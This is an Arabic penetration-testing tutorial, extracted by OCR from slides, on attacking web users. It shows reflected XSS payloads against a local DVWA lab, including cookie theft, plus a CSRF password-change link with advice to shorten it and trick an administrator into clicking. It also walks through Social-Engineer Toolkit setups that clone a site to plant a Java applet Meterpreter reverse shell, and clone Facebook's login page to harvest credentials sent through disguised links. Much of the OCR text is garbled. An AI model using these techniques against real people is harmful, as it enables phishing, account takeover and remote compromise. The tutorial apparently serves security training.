من أجل اكتشاف هذه الثغرات يجب أن تكون قادراً على فهم كيف يتم 
قبول ومعالجة دخل المستخدم من قبل تطبيق الويب وكيف يتم تضمينه 
في صفحة الخرج. 

المفتاح هو إيجاد الصفحات التي تقبل دخل من المستخدم ومن ثم 
القيام بإدخال بعض القيم للقيام بعملية فحص الثغرة 

من أجل النجاح باستغلال R۴‏ يجب أن تعرف كل البرامترات 


I 
بنجاح.‎ 


اختبار اختراق سيرفرات وتطبيقات الويب 


هذه العملية تشبه لحد ما إعداد تعليمة طلب ا8 خبيث كما مر مهنا 


في هجوم حقن اهو 


استغلال مستخدم الویب: 
سنقوم باستخدام بعض الأدوات والتقنيات للقيام بعملية استفلال 
لثغرات R۴‏ ۵ھ 88× ضد مستخدم الويب. 
الهجمات على مستخدم الويب تتضمن: 
:XSS‏ استغلال تغرات ×SS‏ بك llنgعيj reflected and stored‏ 


Burp Suite plخiwlڊ‎ (jıSgكJ|)‎ ةwسلlجلا لسرقة‎ 


:€SR۴ ۰‏ استغلال تغرة ٥SR۴‏ لتغير كلمة سر المستخدم باستخدام 
Burp Suite‏ 


Social-Engineer Toolkit plخiwlڊ‎ :ةيعlnتجالl هجمات الھندسة‎ ٠ 
(SET) 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Cross-Site Scripting (XSS) مgوج®‎ 


الطريقة الكلاسيكية لإثبات وجود هذه التغرة هو استخدام نافذة 
صنبتقةت Script alert ٥×‏ avaل‏ والتي تظهر عندما يبدا الكود بالعمل 


قي متصفح المستخدم الهدف. 


هذه العملية ليست عملية خطيرة أو خبيثة ولكن يمكن استخدامها 
بشکل خبیث من أجل کشف معلومات باستخpl malicious payload‏ 


مختبر الاختراق يجب أن يكون على معرفة جيدة بتقنيات الترميز وفك 
الترميز encoding and decoding‏ المستخدمة مع البرامترات الموجودة 
في عناوين ا۴ل وتقنيات التحقق من الدخل المستخدمة كالية حماية 


من الضروري أن تعرف كيف تقوم بترميز ١ء۸٠‏ وفك ترمیز كەك 
الدخل الخبيث لتستطيع التغفلب على تقنيات الحماية الموجودة في 
تطبيق الويب. 


يوجد العديد من تقنيات الترميز مثل: 


Base64 " 

URL " 

HTML = 

ASCII Hexadecimal " 
UTF-8 " 

Long UTF-8 " 


اختبار اختراق سيرفرات وتطبيقات الويب 


Binary " 

UTF-16 " 

UTF-7 "‏ 
معظم آداوات اختبار الاختراق ومنھا Suite‏ م8 تحوي على آداوات 
تساعد ترميز وفك ترميز القيم المراد استخدامها كدخل خبيث. 
أحد العوامل المهمة التي يجب أن تفهمها عند التعامل مع 88× هو 
السياسة المتبعة في |olمiتصai origin policy in browser‏ 
هذه السياسية يمكن أن تقوم بمنع السكريبت من العمل في الصفحات 
الغير موثوقة ويمكن أن تسمح بعملها في صفحات ومواقع أخرى. 
المتصفح يجب أن يثق بالموقع لأن الموقع سوف يرد على المتصفح 
بسكريبت ويجب أن يتم تنفيذها لتتم عملية الهجوم. 
يجب أن تجد ثغرات 88× في المواقع التي يثق بها المستخدم الهدف 


من أجل أن يتم تنفيذ السكريبت الخبيث في المتصفح الخاص به. 


اختبار اختراق سيرفرات وتطبيقات الويب 


:XSS Payload 


يوجد العديد من sلهدهارهم‏ الخطيرة والتي يمكن تسليمها من خلال 
ثفرة 88× 


:»SS Paراهaلء بعض‎ 


" النوافذ المنبتقة. 

سرقة فعرف الجلسة. 

إعادة توجيه متصفح الهدف إلى عنوان ال مختلفة. 
"° iiصب keylogger‏ 


reverse shell plخiiwږlڊ فتح جلسة اتصال عكسضي‎ ١ 


تقنيات الترميز و فك الترميز تلعب دور كبير في هجمات 55× لذلك يجب 


بروکس الاعتراض يعتبر مفید جداً خلال هجمات 88× من أجل تجاوز 
تقنيات الفلترة المستخدمة في تطبيقات الويب من آل الحماية ضد 
هجمات .×S8‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Reflected XSS Attack 
الشكل التالي يظهر خطوات هذا الهجوم‎ 


5. Malicious 
script 
executes 


. 2. Send malicious link 


. 6. Cookie is sent 


4. Respond with 
malicious script 


Hacker 


7. Masquerade as victim 


3. Send malicious request 
Web application 


لنجاح هذا الهجوم يجب تحقق أمرين أساسيين: 


٠‏ الهدف يجب أن يقوم بعمل معين (مثلاً الضغط على الرابط الخبيث) 
١‏ الهدف يجب أن يقوم بتسجيل الدخول إلى الموقع المصاب قبل أن 
يقوم بالضعط على الرابط الخبيث. 


لنجاح هذا النوع من الهجمات يجب أن تتأكد من أن الهدف قد قام 
بعملية تسجيل الدخول إلى الموقع المصاب ومن ثم يجب أن تخدعه 
بطريقة معينة من أجل ان يقوم بالضغط على الرابط الخبيث. 


اختبار اختراق سيرفرات وتطبيقات الويب 


سنقوم بهجوم ×SS‏ لءاعءماf۴ما‏ على التطبيق الهدف 0۷۷۸ 
التطبيق الهدف يطلب من المستخدم إدخال اسمه ومن ثم يقوم بعرض 
رسالة ترحيب تحوي على اسم المستخدم 
وهذا يعني أن دخل المستخدم يتم استخدامه في الخرج الذي يتم عرضه 
على المتصفه. 

Vulnerability: Reflected Cross Site Scripting (XSS) 


What's your name? | | Submit 


Hello Jameel 


لنبداً بإدخال تعليمة تقوم بعرض نافذة منبثقة 
JavaScript pop-up alert‏ 
باستخدام الصيعة التالية: 


<script>alert("Jameel was here!")</script> 


اختبار اختراق سيرفرات وتطبيقات الويب 


Jameel was here! 


هجوم 55× reflected‏ يسمى أيضاً “ "whoever clicks it, gets it‏ 
وهو هجوم لمرة واحدة ويتم عندما يقوم الهدف بفتح الرابط الخبيث 
وسيتم تنفيذ الكود الخبيث في متصفح الويب الخاص به. 


المتصفح يثق بتطبيق الويب 0۷۷۸4 لأنه قد سمح بتنفيذ السكريبت 
الموجود في الرد القادم من التطبيق. 


اعتراض إجابة السيرفر: 


يجب أن تفهم كيف يقوم تطبيق الويب بمعالجة دخل المستخدم لتتمكن 
من التحايل على تقنيات الحماية المستخدمة في التطبيق. 


اختبار اختراق سيرفرات وتطبيقات الويب 


بعض إجراءات الحماية تكون في جانب المستخدم وقبل أن يتم إرسال 
الطلب إلى التطبيق والبعض الآخر يكون قبل أن يتم تسليم الإجابة إلى 
المتصفح. 


يمكنك فحص الطابات التي يتم إرسالها من المتصفح والتي يتم 
استقبالها وقبل أن تصل إلى المتصفح وذلك باستخدام بروکس اعتراض 


intercepting proxy 
بشكل افتراضي فإن ر×ه٣۴ م٣8 لا يقوم باعتراض الإجابات القادمة من‎ 
تطبيق الويب ولكن يمكن تفعيل هذه الخاصية كما في الشكل التالي:‎ 


Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder j Comparer | Extender | Options | Alerts 


[Intercept HTTP history | WebSockets history Options 


(2) Intercept Server Responses 


0 Use these settings to control which responses are stalled for viewing and editing in the Intercept tab. 


J Intercept responses based on the following rules: 


Add Enabled Operator Match type | Relationship Condition 
3 Content type h... Matches text 
Edit - Or Request Was modified 
Û Or Request Was intercepted 
Remove ٠ And Status code Does not match ^304$ ۳ 
1 : O0 And URL Is in target scope 
Up 
Down 


الآن أصبح بإمكاننا رؤية كل طلب يتم إرساله وقبل أن يصل إلى تطبيق 
الويب وكل إجابة قادمة من تطبيق الويب وقبل أن تصل إلى المتصفح. 


اختبار اختراق سيرفرات وتطبيقات الويب 


عندما تقوم باعتراض الطلب فيمكنك أن ترى أنه قد تم إضافة سكريبت 


في اسم البرامتر A۷۴‏ كما في الشكل التالي: 


Target Bio | Spider Scanner j Intruder | Repeater | Sequencer | Decoder | Comparer |j Extender | Options | Alerts 
lntereepi | HTTP history | WebSockets history | Options 


lf] Request to http://127.0.0.1:80 


|_Forward | | Drop | | Intercept is on | | Action 1 


Raw | Params | Headers | Hex 


GET request to /dvwa/vulnerabilities/xss_r/ 


Type Name | Value 

URL name <script>alert("Jameel was here!")</script> 
Cookie security low 

Cookie _js_datr pGSbVoxcbPbsO0bQcLSpLKUnh 

Cookie PHPSESSID b2bq20v68i3kna9h7bvnnkqva4 


هذا يسمح لنا برؤية كل طلب ومن ثم يجب أن نقوم بالضغط على 
oadساهf‏ من أجل تمرير الطلب إلى تطبيق الويب ومن ثم الضغط على 
woadساهf‏ مرة أخرى من أجل تمرير الإجابة القادمة من تطبيق الويب إلى 
المتصفح. 

الإجابة القادمة من تطبيق الويب تظهر أن الأحرف ليست كلها نص 
صريح وبعضها مرمز. 

مثلا: الإشارة " > “ يتم ترميزها باستخدام الرمز " 30% ٠“‏ وإشارة " < “ 


یتم ترمیزها باستخدام الرمز " 38% “ 


اختبار اختراق سيرفرات وتطبيقات الويب 


إذا لم تكن على معرفة بتقنية الترميز المستخدمة في عناوين ا۸ا 


Burp Suite في‎ öدوجوملا‎ Decoder ölدÎ‎ مIدختسا يمكنك‎ 


عند القيام بالسماد بتوجيه هذا الإجابة ( بالضغط على ۹٣W2٣ه؟)‏ سوف 
يتم توجيه هذه الإجابة إلى المتصفد ويمكنك فحص کود 1۲۸۷1 كها 
في الشكل التالى: 


Target | 7I0 | Spider |j Scanner |j Intruder | Repeater | Sequencer | Decoder | Comparer | Ext 


| Intercept | HTTP history WebSockets history | Options 


Response from http://127.0.0.1:80/dvwaf/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%22Jameel 


Forward | Drop | [ Intercept is on | | Action | 


Raw | Headers | Hex | HTML | Render 


<div class="body_padded"> 
<hl>Vulnerability: Reflected Cross Site Scripting (XSS)</hl> 


<div class="vulnerable_code_area"> 
<form name="XS55" action="f§" method=" GET'"> 


<p> 
What's your name? 
<input type="text" name="name" > 
<input type="submit" value=" Submit " > 
</p> 
</form> 
<pre>Hello <script>alert ("Jameel was here!")</script></pre> 


</div> 


وهذه إشارة واضحة على نجاح هجوم 88× لأن کود ٧٣1‏ الذي تم 


إرساله من قبل تطبيق الويب إلى المتصفح يحوي على كود الاستغلال 
الذي قمنا باستخدامه. 


اختبار اختراق سيرفرات وتطبيقات الويب 


:»SS Payاهads ترميز‎ 


العمل مع القيم المرمزة هو طريقة قوية من أجل اكتشاف ما هو 
المسموح به في تطبيق الويب. 


يمكننا استخدام أداة hecoder‏ الموجودة في Burp Suite‏ من جل 
ترميز الدخل المستخدم في هجوم 88× 


Burp Suite Free Edition v1.6.31 
Burp Intruder Repeater Window Help 
Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 
@ Text O Hex 2 


(Decode as ...__|w) 


<script>alert("Jameel was here!")</script>| 


Plain 

URL 
HTML 
Base64 
ASCII hex 
Hex 


Se #X3C; Ke #X 73; 6e #X63; Se #X 72; Se #X69; 6e #X70; e #X74; Sc #X3 e; 6e #X61; 8e #X6 C; Se #X65; 6e #X 72; Se #X 74; Se #X28; 6e #X22; 6c #X4 a; Se #X6 1; &c#X6d; &c#X65; Sc} 


ûÃûÃ€€€€kÃHÃHÃHQÃûÃHAHEHEH Smart decode‏ گے,2)] 


يمكننا اختيار تقنية الترميز التي نرغب بها ومن ثم نقوم بنسخ الكود 
المرمز ولصقه في lلبرolٿتj los NANE‏ في الشكل التالي 


اختبار اختراق سيرفرات وتطبيقات الويب 


Pro | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder j Comparer | Extender | Options | Alerts 


Intercept | HTTP history | WebSockets history | Options | 


[2| Request to http://127.0.0.1:80 
Forward Drop | Intercept is on | Action 


GET request to /dvwa/vulnerabilities/xss_r/ 


Type | Name | Value 

S%O6S712%6S21%22% 29327 
Cookie security low 
Cookie _js_datr pGSbVoxcbPbsObQcCLSpLKUNnh 
Cookie PHPSESSID b2bq20v68i3kna9h7bvnnkqva4 


ومن ثم توجيه الطلب إلى تطبيق الويب 


والإجابة التي سوف تقوم بإظهار نافذة منبثقة تعتبر دخل مقبول من 


:XSS in URL Address 


يمكننا استخدام عنوان ال من أجل القيام بهجوم 88× 


عندما یتم استخدام اسم عادي متل ۳6ول کدخل سوف یکون عنوان 
ا8ل هو التالي: 


@ 127.0.0.1/dvwa/vulnerabilities/xss_r/?name=jameel# 


یمکننا استخدام encoded-اUR‏ للقیام بهجوم 58× بشکل مباشر 


من خلال كتابة كتابة عنوان ا8ل التالى: 


اختبار اختراق سيرفرات وتطبيقات الويب 


http://127.0.0.1/dvwal/vulnerabilities/xss_r/?name=%3c%73%63V% 7269 70% 74% 3E 61% 6C6 T7 
2%T42822 4AN 616A 6C2ON 7761 73V 2O68 7262122232 
TYG 726I% 70% 74% 3eF# 


وعندما يتلقى تطبيق الويب هذا الطلب فسوف يرد بإظهار نفس 


النافذة المنبثقة وهذا يعني أنه تم تنفيذ السكريبت في متصفح 
المستخدم. 


Jameel was here! 


سرقة فعرف الجلسة باستخدام هجوم S؟SS؟×:‏ 
يمكننا استخدام الطريقة document .cookie‏ في هجوم 68× من أجل 
عرض فعرف الجلسلة الخاصة بالهدف على الشاشة. 

وذلك باستخدام الصيعة التالية: 


<scrip>alert{(document. cookie)</script> 


اختبار اختراق سيرفرات وتطبيقات الويب 


security=low; _js_datr=pGSbVoxcbPbsObQcLSpLKUnh; PHPSESSID=b2bq20v68i3kna9h 7 bvnnkqva4 


الآن يمكننا وبسهولة حقن قعرف الجلسة (ءi)ممء)‏ في المتصفح 
الخاص بنا والدخول إلى حساب الهدف بدون معرفة كلمة السر الخاصة 


به. 


:Cross-Site Request Forger (CSRF) 


من أجل نجاح هجوم تزوير الطلبات يجب أن نعرف كل البرامترات الموجودة 
في الطلب. 


الصفحة الخاصة بهذه الثغرة في تطبيق الويب الهدف 0۷۷۸ تحوي 
على آلية لتفير كلمة السر الخاصة بالمستخدم. 

إذا قمنا بتغير كلمة السر الخاصة ب ماص كه واستخدمنا الكلمة 
4مم فسوف يتم إرسال الطلب إلى تطبيق الويب والذي سوف 


يرد بتغير كلمة السر. 


http://127.0.0.1/dvwa/vulnerabilities/csrf/?password new=pass1234&password conf=pass 
1234&Change=Change# 


اختبار اختراق سيرفرات وتطبيقات الويب 


تطبيق الويب يستخدم برامترات ا۸ل من أجل تمرير القيم إلى التطبيق 
ليقوم بمعالجتها. 

البرامتران: 

password_new 


password_ conf 

هما مركز اهتمامنا في هذا الهجوم. 

يمكننا وبسهولة تغير هذه القيم في عنوان ال0 ومن ثم إعادة تحميل 
الصفحة وسوف يتم تغير كلمة السر. 

تخيل ما الذي سوف يحدث لو قمنا بإعداد رابط من هذا النوع وقام 
الشخص الهدف بالضغط على هذا الرابطء سوف يتم تغير كلمة السر 
الخاصة به و بدون معرفته. 

طبعاً لنجاح هذا الهجوم يجب أن يكون الهدف قد قام بعملية تسجيل 
الدخول إلى تطبيق الويب قبل أن يقوم بالضغط على الرابط الخبيث 
يمكن أن نحول هذا الرابط إلى رابط مختصر (العديد من المواقع تقدم 
هذه الخدمة بشكل أون لاين) ومن تم وضع الرابط المختصر في رسالة 


داخل موقع أو منتدى معين والطلب من مدير الموقع حل مشكلة معينة 
متعلقة بهذا الرابط وعندما يقوم مدير الموقع بالضغط على هذا الرابط 


فسوف يتم تغير كلمة السر الخاصة به. 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Social engineering ةيıcعleoتiجاlلl‎ ةسدiنه®نلا‎ 


هي فن التلاعب في البشر من أجل خداعهم وإقناعهم بالقيام بأعمال 
العديد من الهجمات في طرف المستخدم تتم بالاعتماد على خداع 
المستخدم من أجل كشف المعلومات الحساسة الخاصة بنظافه. 
الهندسة الاجتماعية يمكن أن تتم عن طريق اجراء مكالمة هاتفية 
مخادعة أو أن يقوم مختبر الاختراق بتظاهر على أنه موظف مصرح له 
بالوصول للنظام. 

أفضل طريقة للقيام بهجوم هندسة اجتماعية ناجح هو امضاء وقت جيد 
لفهم النظام الهدف ومعرفة الطريقة التي يتصل بها المستخدم 
بالشبكة أو الموقع الهدف. 

يوجد العديد من الطرق والتقنيات الممتعة لهجمات الهندسة الاجتماعية 


والتي يجب أن تمضى وقتاً التعرف عليها. 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Social Engineering Toolkit (SET) 
هذه الأداة تم کتابتھا من قبل مؤسس c٥c٥e45اsں٣ وهي أداة‎ 
مفتوحة المصدر مكتوبة بلغة بايثون ومعدة للقيام بعمليات اختبار‎ 

الاختراق عن طريق الهندسة الاجتماعية 


۳ هي الأداة التي تستخدم بكثرة من قبل مختبري الحماية من أجل 
القيام بعملية فحص حالة الحماية للمنظمات أو الشركات الهدف. 


هذه الأداة موجودة بشكل تلقائي في نظام كالي لينكس ويمكن 
الوصول إليها باستخدام التعليمة 


:~# setoolkit 


استخدام S۴۲‏ في الهجوم: 

يمكن الوصول إلى المستخدم الهدف عن طريق موقع يثق فيه هذا 
المستخدم ويمكن استخدام أي موقع ولكن يفضل استخدام موقع بسيط 
المثال التالي هو عملية نسخ لموقع i"tم۴م٣هاS‏ (يمكن أن يكون أي 
موقع أخر) والهدف من ذلك هو استغلال الضحية من خلال فتح جلسلة 
meterpreter‏ والاتصال والتحكکم بجهاز الهدف 
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Reqister Forgot your password? 


tted 


Social-Engineer Toolkit (1 رlıخJ| أختر‎ 


Social -Engineering Attacks 
Fast-Track Penetration Testing 
Third Party Modules 

Update the Social -Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


Exit the Social -Engineer Toolkit 
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الشاشة التالية تظهر أنواع الهجمات المختلفة الموجودة ضمن هذا 
الخيار 


Select from the menu: 


Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 


Arduino -Based Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


مم 
O O O <Y OQ J1 5 J N‏ 


Return back to the main menu. 


e 
e 


Website Attack Vectors jlii dgڊٻ‎ Jlûمل| في ھذ|ا‎ 


Java Applet Attack Method 
Metasploit Browser Exploit Method 
Credential Harvester Attack Method 
Tabnabbing Attack Method 

Web Jacking Attack Method 
Multi-Attack Web Method 

Full Screen Attack Method 

HTA Attack Method 


س ل۸ لU E‏ اک 0 آ 0O‏ 


Return to Main Menu 


e 
e 


Java Applet Attack jlii dg 


Web Templates 
Site Cloner 
Custom Import 


Return to Webattack Menu 


ختبار اختراق سيرفرات وتطبيقات الويب A٤‏ 


سوف يتم سؤالك إذا كنت تريد استخدام أحد القوالب الموجودة في 
S1‏ أو إذا كنت تريد نسخ موقع 

القوالب الافتراضية ليست جيدة وانصحك بنسخ الموقع الذي تريد 
استخدامه في عملية الهجوم (في ® (SharePoint JlinJl|‏ 

الشاشة التالية تظهر عدة خيارات عن كيفية نسخ الموقع من قبل 
المستخدم؛ في هذا المثاJ‏ لصوف iiwiڌp site-cloner option‏ 

بعد تحدید هذا الخیار فإن S۴۲‏ سوف تسأل سلسلة من الأسئلة وهي: 


:NAT/Port forwarding " 


: >2 
[-] NAT/Port Forwarding can be used in the cases where your SET machine is 


[-] not externally exposed and may be a different IP address than your reverse lL 
istener. 
> Are you using NAT/Port Forwarding [yes |no] : 


هذا الخيار هو سؤال فيما إذا كان الهدف سوف يتصل مع جهازك عن 
طريق عنوان ۱۴ الخاص بنظام الكالي أو عن أنه سوف يتصل عن طريق 
عنوان ۱۴ مختلف (NAT address Jin)‏ 
اختر وهر إذا كنت تريد مهاجمة أشخاص ضمن شبكة خارجية أو اختر 
0 إذا كنت تريد مهاجمة أشخاص ضمن نفس الشبكة الخاصة بك 
(شبكة داخلية) 
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:IP address/hostname for reserve connection " 


> IP address or hostname for the reverse connect ion: 


عندما تقوم S٤١‏ بتسليم ۹دهارهم إلى الهدف فهو بحاجة لأن يخبر 
الهدف كيف سيقوم بالاتصال العكسي مع كالي 


يمكنك وضع عنوان ۱۴ الخاص بنظام الكالي 


:URL you want to clone "= 


[-] Example: http://www.thisisafakesite .com 


batt > Enter the url to clone: 


عنوان الموقع الذي تريد نسخه من أجل استخدامه في الهجوم 
to deliver "‏ oitاExpP€:‏ سوف پیستخدم Metasploit‏ من آجل تسليم 
الاستغلال 
Metrpreter Memory Injection jliخi gw‏ 


wnat payload do you want to generate: 
Name : Description: 


1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter 
ad through PyInj ector 

2) Meterpreter Multi -Memory Injection This will drop multiple Metas 
payloads via memory 

3) SE Toolkit Interactive Shell Custom interactive reverse to 
designed for SET 

4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with 
encryption support 

5) RATTE HTTP Tunneling Payload Security bypass payload that 
tunnel all comms over HTTP 

6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter 
ad through shel lcodeexec 

7) Import your own executable Specify a path for your own e 
able 
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سوف يسال عن رقم البورت الذي يجب عليه استخدامه 


> PORT of the listener [443]: 


Windows Meterpreter Reverce TCP jlii pû 


Select the payload you want to deliver via shellcode injection 


Windows Meterpreter Reverse [CP 


Windows Meterpreter (Reflective Injection) Reverse HTTP Stager 
Windows Meterpreter (ALL PORTS) Reverse TCP 


) 
J) Windows Meterpreter (Reflective Injection), Reverse HITPS Stager 
) 
) 


وبعد الاجابة على هذه الأسئلة فإن S٤۲‏ سوف يقوم برفع صفحة 
الموقع المزورة التي قمنا بنسخها إلى سيرفر الأباتشي 

وتشغیل المیتاسبلویت وإعداد ۴٥ا‏ ۵٣ط‏ من أجل استقبال الاتصال 
العكسي 

يجب عليك خداع المستخدم من أجل أن يقوم بالدخول إلى هذا الموقع 


المزور وعندما يقوم بالدخول إلى هذا الموقع سوف تظهر له نافذه 


منبثقة مں-مهم ۷aول‏ والتي إذا عملت فسوف تؤمن جلسة اتصال 
عكسي مع نظام الكالي 


Reservr_TCP Meterpreter 
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مختبر الاختراق ومن خلال جالسة ٣٥امامeterمصm‏ يمتلك صلاحيات كاماة 
على جهاز الهدف. 


النافذة المنبثة التي سوف تظهر للهدف تبدو طبيعية وهي غير مثيرة 
ull‏ |ء 


Warning - Security 


The application's digital signature cannot be verified. 
Do you want to run the application? 


Publisher: UNKNOWN 
Fro: http://10.255.27.200 


TET Name: Trusted Java Applet (VERIFIED SAFE) 


E. EH 


with unrestricted access which may put 
rps ar E Mora Information, 
trust the publisher, 


في الوقت الذي يقوم به الهدف بالضغط على ٣ا٣‏ فان جھازہه سوف 
يتصل مع الكالي وسنحصJلJ :üllaû meterpreter ةulج JJe‏ 
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التصيد وhishingمp:‏ 


هذا الهجوم يتم من خلال خلق صفحة تسجيل دخول مماثلة تماماً 
لصفحة تسجيل الدخول الخاصة بموقع الفيس ولكن في الصفحة المزورة 
يتم تغيير بعض البرامترات ليتم إرسال بيانات تسجيل الدخول الخاصة 
بالهدف إلى مختبر الاختراق ومن ثم إعادة توجيه الهدف إلى صفحة 
الفيس الأصلية. 


يمكن القيام بهذه العملية بشكل يدوي من خلال نسح الكود المصدري 
لصفحة تسجيل الدخول الخاصة بالفيس بوك ومن ثم التعديل عليها 


أو يمكن القيام بهذه العملية بشكل اتوماتيكي باستخدام أداة 
Social-Engineer Toolkit (SET)‏ 
سوف نستخدم الخيار الأول: 


Social-Engineering Attacks 


Select from the menu: 


1) Social -Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Social -Engineer Toolkit 
Update SET configuration 
Help, Credits, and About 


99) Exit the Social -Engineer Toolkit 


> 
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ثم الخيار الثاني 


Website Attack Vectors 


Select from the menu: 


1) Spear-Phishing Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 


س 


Arduino -Based Attack Vector 


Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


لا ظط آل @ > 0 © ° 


یم 


Return back to the main menu. 


e 
e 


Vv 
ا‎ 


ثم الخيار الثالث 


Credential Harvester Attack Method 


Java Applet Attack Method 
Metasploit Browser Exploit Meathod 
Credential Harvester Attack Method 
Tabnabbing Attack Method 

Web Jacking Attack Method 
Multi-Attack Web Method 

Full Screen Attack Method 

HTA Attack Method 


O YY QO J BEN) i 


Return to Main Menu 
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ثم الخيار الثاني 


Site Cloner 


1) Web Templates 
Site Cloner 
J) Custom Import 


J) Return to Webattack Menu 


1 


> IP address for the POST back in Harvester/Tabnabbing:] | 


سوف يطلب إدخال عنوان ۱۴ المستخدم في عملية الهجوم 


للقيام بهذا الهجوم عبر الانترنت (خارج الشبكة المحلية) سنقوم بوضع 

عنوان ۱۴ الخارجي ومن تم الدخول إلى إعدادات الراوتر والقيام بعملية 
port forwarding or virtual server‏ 

يمكننا معرفة عنوان ۱۴ الخارجي من خلال البحث عبر ماوەمg‏ عنj what‏ 

is my IP 

سنقوم بإدخال هذا العنوان ليتم إستخدامه في هذا الهجوم 

الآن يجب أن نقوم بالدخول إلى صفحة الإعدادات الخاصة بالراوتر والقيام 

بعملية توجيه كل الطلبات القادمة إلى عنوان ١۴‏ الخارجي عبر المنفذ 80 

إلى عنوان ۱۴ الداخلي 
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لمعرفة عنوان ۱۴ الداخلي من خلال التعليمة التالية 


:# ifconfig 
Link encap :Ethernet HwWaddr 88:ae:1d:b0:18:b5 


inet addr : Avo Bcast:172.16.2.255 Mask: 


من صفحة إعدادت الراوتر سنقوم بعملية التوجيه ( هذه الإعدادات 


تختلف بحسب نوعية الراوتر يمكن أن تكون موجودة في ٣0م‏ 
(forwarding or virtual server‏ 


Virtual Server 


Virtual Server for EIFS 
ELT 
maronmumber | 

172162100 


من خلال هذه العملية قمنا بإعداد الراوتر ليقوم بتوجيه أي طلبات 
لعنوان ١۴‏ الخارجي عبر المنفذ 80 إلى عنوان ١۴:172.16.2.100‏ الداخلي 


سوف يطلب مننا إدخال عنوان الموقع المراد استخدامه في عملية 
الهجوم 


> Enter the url to clone: facebook . com 


Cloning the website: 0S login. faceboo! 


EHES -& 
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ثم 1 1 hh oo‏ غا سیرفر الابات ٤‏ من آل هه افة آ o»‏ المزورة 


. raa tO 1 N1Z& E 1 n أ‎ 
[*] ALL files have been copied to /var/www/htmlL 
Press return to continue | 


الصفحة المزورة أصبحت في المسار التالى /|mغvar/www/h‏ 


index.html awl وهي‎ 

الآن يجب ان نقوم بتحويل عنوان ١۴‏ الخارجي إلى رابط (لكي لا يثير 
شك الهدف) من خلال الموقع llلتlلي: http://tinyurl.com‏ 

الآن يمكننا إرسال هذا العنوان إلى الهدف عبر ممهءام۸س أو عبر رسالة 
ايميل مخادعة والطلب من الهدف ليقوم بفتح هذا الرابط 


وعندما يقوم الضحية بفتد هذا الرابط سوف تظهر الصفحة التالية 
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(4/ للتمتع بتجربة أفضل مع فيس بوك» انتقل إلى موقعنا الأصلي أو حدث متصفحك. 


تسجيل الدخول إلى فيسبوك 


البريد الإلكتروني أو 
الهانف: 


کلمه السر: 
[ ] البقاء فيد جيل الاخول 
أو التسجبل في فبسبوك 


هلل نسيت كلمة ‏ افسر؟ 


وعندما يقوم الهدف بكتابة معلومات تسجيل الدخول والضفط على زر 
تسجيل الدخول سوف يتم إرسال هذه المعلومات إلى الملف النصي 
الموجود في المسار التالي 


varlwww/lIhtmlI/havester.txt/ 


وإعادة توجيه الضحية إلى صفحة الفيس الأصلية 
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۰ ٠ رمه‎ 


[lsd] => AVrYwtNJ 

[display] => 

[enable_profile_ selector] => 

[isprivate] => 

[legacy_return] => 1 

[profile _ selector _ ids] => 

[skip_api_login] => 

[signed_next] => 

[trynum] => 1 

[timezone] => 

[lgndim] => eyJ31j o03Mj AsImgiO0j EyODAsImF31Ij o3Mj AsImFol j oxMj gwLCJj Ij c 
[lgnrnd] => 015340_QsbP 

[lganjs] => Nn 
ENES EEE 

HEEE SS EEE 
[default_persistent] => 0 
]اهو1٣[‎ =< تسجيل الدخول‎ 


عند استخدام أداة مثل S٤١‏ للقيام بمهاجمة المستخدمين فإنه من 
الضروي لمختبر الاختراق أن يمضي وقتاً لفهم تصرفات الهدف 
والطريقة التي يستخدمها في الوصول إلى الموقع عن طريق جهاز 
الحاسب أو عن طريق جهاز الموبايل ليتم برمجة واجهة الصفحة المزورة 
بشكل متناسق مع جهاز الهدف. 
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